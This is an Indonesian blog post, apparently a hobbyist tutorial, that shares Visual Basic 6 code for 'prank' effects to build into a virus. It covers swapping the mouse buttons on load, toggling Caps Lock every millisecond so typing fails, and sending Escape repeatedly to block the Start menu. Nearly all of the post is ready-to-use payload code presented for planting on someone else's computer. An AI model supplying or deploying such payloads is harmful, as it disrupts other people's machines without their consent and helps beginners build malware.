Bikin virus dengan efek jahil(VB6)

buat para master ga usah baca deh dari pada nyesel baca ginian hehehehe
buat newbie aja ya !

saya di sini akan share code untuk membuat virus mempunyai efek yang jahil bukan membuat virus, kalo contoh virus saya udah pernah share deh disini ato tanya ama om master aja pasti tahu )-l

ok langsung aja udah siap program VB6 mu, begin:
form1

Code:
Option Explicit
Private Declare Function SwapMouseButton _
Lib "user32" (ByVal bSwap As Long) As Long
Private Const PENCET = &H100&

 

Private Sub Form_Load()
SwapMouseButton PENCET
End Sub

ini kode untuk membalikan mouse key, kiri jadi kanan, kanan jadi kiri, cukup jail kah untuk virus mu
lanjut:
module

Code:
Public Const VK_CAPITAL = &H14
Public Const KEYEVENTF_KEYUP = &H2
Public Declare Sub keybd_event _
Lib "user32" (ByVal bVk As Byte, _
ByVal bScan As Byte, ByVal dwFlags As Long, _
ByVal dwExtraInfo As Long)

timer1

Code:
Call keybd_event(VK_CAPITAL, 0, 0, 0)
Call keybd_event(VK_CAPITAL, 0, KEYEVENTF_KEYUP, 0)

code diatas untuk membuat fungsi keyboard gak jalan, triknya adalah membuka dan menutup caps lock berulang ulang, jangan lupa timer1 di set dengan interval 1, nah jail gak tuh
lanjut:
form1

Code:
Private Const VK_ESCAPE = &H1B
Private Const KEYEVENTF_KEYUP = &H2
Private Declare Sub keybd_event _
Lib "user32" (ByVal bVk As Byte, _
ByVal bScan As Byte, ByVal dwFlags _
As Long, ByVal dwExtraInfo As Long)

timer1

Code:
Private Sub Timer1_Timer()
Call keybd_event(VK_ESCAPE, 0, 0, 0)
Call keybd_event(VK_ESCAPE, 0, _
KEYEVENTF_KEYUP, 0)
End Sub

code ini berguna mendisable fungsi start, dengan menutupnya berulang-ulang, jangan lupa timer1 set intervalnya 1

thanks buat yang mau baca komen yah
for newbie to newbie )-l

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s